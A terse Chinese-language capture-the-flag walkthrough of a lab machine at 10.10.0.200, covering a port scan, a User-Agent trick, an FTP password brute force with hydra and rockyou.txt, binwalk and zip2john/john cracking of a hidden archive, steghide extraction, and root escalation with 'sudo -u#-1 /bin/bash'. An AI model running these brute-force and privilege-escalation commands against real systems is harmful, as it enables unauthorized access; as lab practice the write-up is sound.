扫描,发现ftp端口

80端口
Pasted%20image%2020240125155814
Agent那里改成C的时候跳转了,提示ftp弱密码
hydra -l chris -P /Users/dionysus/CTF/tools/rockyou.txt ftp://10.10.0.200

爆破出来链接上去,之后mget *全部拉取下来
根据txt的提示,查看图片信息

binwalk一下发现

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
868           0x364           Zlib compressed data, best compression
34817         0x8801          End of Zip archive, footer length: 22

binwalk -e,分离,查看_cutie.png.extracted

因为某些原因,报菜名了

binwalk -e cutie.png

zip2john 8702.zip > hash.txt

john hash.txt

7z e 8702.zip

steghide extract -sf cute-alien.jpg
接下来有点
(ALL, !root) /bin/bash

sudo -u#-1 /bin/bash提权 结束了